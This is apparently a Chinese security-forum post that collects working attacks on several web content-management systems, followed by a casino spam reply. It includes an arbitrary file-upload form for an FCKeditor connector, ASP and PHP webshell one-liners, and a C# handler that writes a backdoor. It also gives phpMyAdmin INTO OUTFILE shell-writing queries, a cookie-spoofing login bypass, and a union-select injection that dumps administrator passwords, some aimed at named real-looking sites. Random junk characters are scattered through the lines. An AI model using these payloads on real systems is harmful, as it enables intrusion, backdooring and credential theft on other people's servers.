1 }1 J) p. M8 Q; J. M, ?: ?YxShop易想购物商城4.7.1版本任意文件上传漏洞4 [( R+ j9 P, B- @- s7 O0 s( i

  v* b" T' h1 S- xhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx/ M* d" l) X/ m
跳转到网站根目录上传任意文件。: S" U, ?4 O6 L
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
9 d- f. b, s& }<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
) W+ {6 E" S/ `' a! K. o( V1 D# iUpload a new file:<br>
. |: M% Q0 t% a3 f; m1 V<input type="file" name="NewFile" size="50"><br>
" b" A; ?6 A* [& a4 X4 X$ y( J<input id="btnUpload" type="submit" value="Upload">
/ G8 i3 c: K8 Z* v! i, e4 [</form>/ g- S$ \: j/ [8 A
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ U. z+ r, [* b7 E3 Z8 i

8 G5 @# e9 J. v) ASDcms 后台拿webshell  v/ q. j/ i& C- q# E  Z

+ M' o+ \' E+ z: o, K' _第一种方法:
" x, w8 J( F! b进入后台-->系统管理-->系统设置-->系统设置->网站名称;
' |; \( H: G3 J2 O! u( Q/ Q把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
% C$ C# B3 [& Q0 [+ j- q9 u5 B+ O用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
, ?/ w3 G8 U$ u' v第二种方法:
/ z, {) _' f; F* ?2 t进入后台-->系统管理-->系统设置-->系统设置->上传设置;; I, U4 Q! d7 V) B1 D3 m
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!' i8 g0 W# q) R) a: W4 f
第三种方法:3 r! f! T7 d: O* U' H# J
进入后台-->界面管理-->模板文件管理-->创建文件
% O  n; a5 x9 y6 c; }6 @7 {文件名写入getshell.ashx, u" _5 g% @5 Z7 z2 P
内容写入下面内容:/ _0 r9 ^9 n% h! y! o+ U
/====================复制下面的=========================/1 [9 g* w# I9 ^) E
<%@ WebHandler Language="C#" Class="Handler" %>
8 W: P+ }: f. M3 dusing System;
" T1 [: z1 y0 {! X2 |6 G* Ausing System.Web;3 _8 e; I) Y. F  \2 x+ B# i( h
using System.IO;! H3 Z& l5 F4 W/ r
public class Handler : IHttpHandler {- Y8 r6 I3 q3 p* u) H) B
public void ProcessRequest (HttpContext context) {0 E7 b( p2 p7 {9 |1 Z) w: k
context.Response.ContentType = "text/plain";
' L7 U/ e; i: U$ N" C$ J! D% W1 W" AStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
. u+ D; _0 g: j: {2 r, Ufile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");" j! ]) R- ~5 J& E3 A
file1.Flush();7 ?  ~/ B! [  ~+ }0 t
file1.Close();
9 F3 `1 [, b# n; C( U# A. A}
0 ?% H* {) G, i& w$ n7 y1 qpublic bool IsReusable {
) ~1 A: N" P  e9 ]" V$ ^/ sget {
: D9 a: J; V" t! n6 Z3 {/ i+ N5 W, jreturn false;! R, Q  Q+ v/ F
}. R. j" c: T( W% S5 c
}
$ b. Q  y1 o1 N4 H: l* d" x3 f}6 w2 Y( M7 p4 u/ ]/ ]% q  @  t/ T: s* R* d
/=============================================// E5 x! |+ I: C& ]& \# Z- s* A' I) ?
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx7 B& E. f& e' w, x
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接" n/ Z* y2 ?( Y+ ^. T  v  \: R
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 T; B) h1 H9 i1 ]% S% ]3 Y5 u5 P% e
# F! i3 N  v, {( }, Y# p+ ]
ESCMS网站管理系统0day
2 z7 r, V: m0 F" K/ p0 S+ M- Y1 Y  O( @0 d- B) U
后台登陆验证是通过admin/check.asp实现的
% j( X, _3 X% Y$ x% ]* o* A( ~+ r
首先我们打开http://target.com/admin/es_index.html4 \: f+ h  k; D" ?; A$ a
然后在COOKIE结尾加上
6 L# ^) ]( v9 i9 ]; ESCMS$_SP2=ES_admin=st0p;
3 l2 w5 f' l/ G, {; e* f/ H' M% T) `修改,然后刷新& f: T7 }9 `$ w$ x) }, G
进后台了嘎..
: u  l+ X) @0 `" X+ x' p4 ~& w' d  C7 r然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL9 o/ Z: H8 L( t* K
( a6 j! ~* Y  Y. j7 |+ h4 d
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
! X" |% {8 P0 w) r5 w嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
! Q" W3 H% L1 U存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..7 k! X0 v0 b1 k2 V) W5 j/ W
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了4 n6 Q0 ^, j* ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 V, R# w: f, `  R
; ]+ a+ d$ Z; U( k" M4 T
宁志网站管理系统后台无验证漏洞及修复
1 E6 \, U% t6 |6 Z! G  d$ [1 U) R0 ~% O$ Q) ?: u
网上搜了一下,好像没有发布.如有雷同纯粹巧合!" E3 G6 ]: z" [% K1 W' v7 P7 p# d
官方网站:www.ningzhi.net
3 {( \  C( @1 l4 y! J. J, L学校网站管理系统 V.2011版本
9 z3 i  J; g6 o' T$ nhttp://down.chinaz.com/soft/29943.htm 8 |5 q5 d: v) l& R5 W/ I
其它版本(如:政府版等),自行下载.9 i: w3 S+ x$ T
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
( L* |  o2 X% q  S) p+ Xlogin.asp代码如下:
  e. E+ I* |5 w3 ]& q: w9 x<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 7 P' I7 _8 }  Z6 y
manage.asp代码我就不帖出来了.反正也没验证.: F' M6 F. V/ R" ?& V# Z
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!6 V% M. ]# y3 Q3 J8 d7 D0 f( M
漏洞利用:
2 o* }3 a: w# |2 \2 g. {& n  q( \直接访问http://www.0855.tv/admin/manage.asp, ]0 t. j# ?; {$ L5 j( T" _
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web52 L# _+ C. S5 r& Y2 B/ [, p
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. C( T" ?, H& @! T* b

6 Q8 o+ m( h" z4 i1 x" N5 ]phpmyadmin拿shell的四种方法总结及修复: {0 ~, C' T" A+ ?# j
+ G* I5 K1 g. D- L8 X1 M$ J4 \& X
方法一:7 q7 x( {$ i) p, u; c
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );7 M4 U. C3 q1 `6 Y
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');4 A; n; S" ?, v  l  Q- E
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';7 A: H1 r% w5 _
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
( J* r) P/ J! E" k    一句话连接密码:7on- V7 j- u6 i+ ^
方法二:" w* U+ I( e3 S# Y7 C- W
读取文件内容:    select load_file('E:/xamp/www/s.php');
# M7 d+ L  [' e写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'! E/ Z% d+ C3 q$ u; D0 r8 U
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
% h  Z( ?& h. ]( M0 H, Q方法三:
7 ^/ l6 Q5 u! R5 O. S2 A6 R" wJhackJ版本 PHPmyadmin拿shell! G4 q) p# L' {7 H7 c
Create TABLE study (cmd text NOT NULL);
# D2 a- f: _2 G8 l+ UInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
* Z# f  w7 ~* Q7 r8 c0 qselect cmd from study into outfile 'E:/wamp/www/7.php';
$ m, i/ `7 D( z6 ^6 u+ j. dDrop TABLE IF EXISTS study;
" {, i0 R& x9 Z4 U4 C2 p9 v8 c<?php eval($_POST[cmd])?>
# }7 L$ l. B5 y. P/ ]8 s, bCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
- T" X" w4 ]0 _INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1& ?) v) x6 ]. o  _  X! k6 p
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 11 k5 w! N7 \" }7 y
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
' `  B7 c- @/ Y) X/ R8 J方法四:
4 _) Z; L' f* C$ Iselect load_file('E:/xamp/www/study.php');
7 Q( }9 @* k5 ~* Y" h( [  Qselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: g. n3 K, U- w0 @然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( U6 |8 Q# ?7 B# w. U7 _! J-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
! n# [* ?/ L& o0 n* d' A
: v1 V% y, W3 Q6 I5 a6 uNO.001中学网站管理系统 Build 110628 注入漏洞
/ u. F8 L" X+ t) o  R& _7 K
, N8 c9 I2 a* T- h8 yNO.001中学网站管理系统功能模块:
& x5 U+ f' Q, z9 V1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等9 Y5 C5 Q! s6 e6 c2 `- F, }) [# D( g
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息! T) s' F5 v' G, l# H! @
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息, g; \7 S, F! c
4.视频图片管理:一级分类,动态添加视频或者图片等信息" o/ N- @! M2 ?) N
5.留言管理:对留言,修改,删除、回复等管理# h2 X: q7 F; Q& |- R
6.校友频道:包括校友资料excel导出、管理等功能
, y$ Q  Y% L: p7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页* ^# I' q; G6 B2 U/ B3 S; f9 V
默认后台:admin/login.asp
. e( B+ {. |% ]  ~* s' C# d( N官方演示:http://demo.001cms.net
" q& F4 P4 o( M/ Q1 q! ^: k源码下载地址:http://down.chinaz.com/soft/30187.htm- k: m) H) V2 B; a) P6 Q0 P
EXP:& G. n; H* T& g5 x" ?9 S) x, J
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin! i) D# {/ Z& F  j4 F) n' `! |
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin( @, L1 O6 g0 _" Y
getshell:后台有备份,你懂的
/ X) j" m. a. U7 e+ Y1 X& g另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。6 O: O3 Z% }* p; Q
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表